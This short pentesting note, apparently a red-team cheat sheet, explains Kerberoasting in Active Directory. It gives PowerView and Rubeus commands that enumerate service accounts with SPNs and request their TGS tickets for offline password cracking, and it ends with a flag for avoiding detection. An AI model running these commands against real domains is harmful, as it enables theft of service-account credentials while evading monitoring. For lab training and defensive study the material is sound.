This attack is used with account that have Service Principle Names (SPN) as we can request a TGS and save to the disk and crack it offline

Searching For Users which have SPNs

Using PowerView

Get-DomainUser -SPN | select name

Untitled

Notice that we have three accounts krbtgt, web svc and svc admin.

Using Rubeus to list kerberoast state

.\\Rubeus.exe kerberoast /stats

Untitled

Notice that Rubeus got 2 kerberoastable users which are web svc and svc admin

Requesting TGS using Rubeus

.\\Rubeus.exe kerberoast /user:svcadmin /simple /nowrap

Untitled

As observed we got the TGS

To Avoid detection we may add the flag /rc4opsec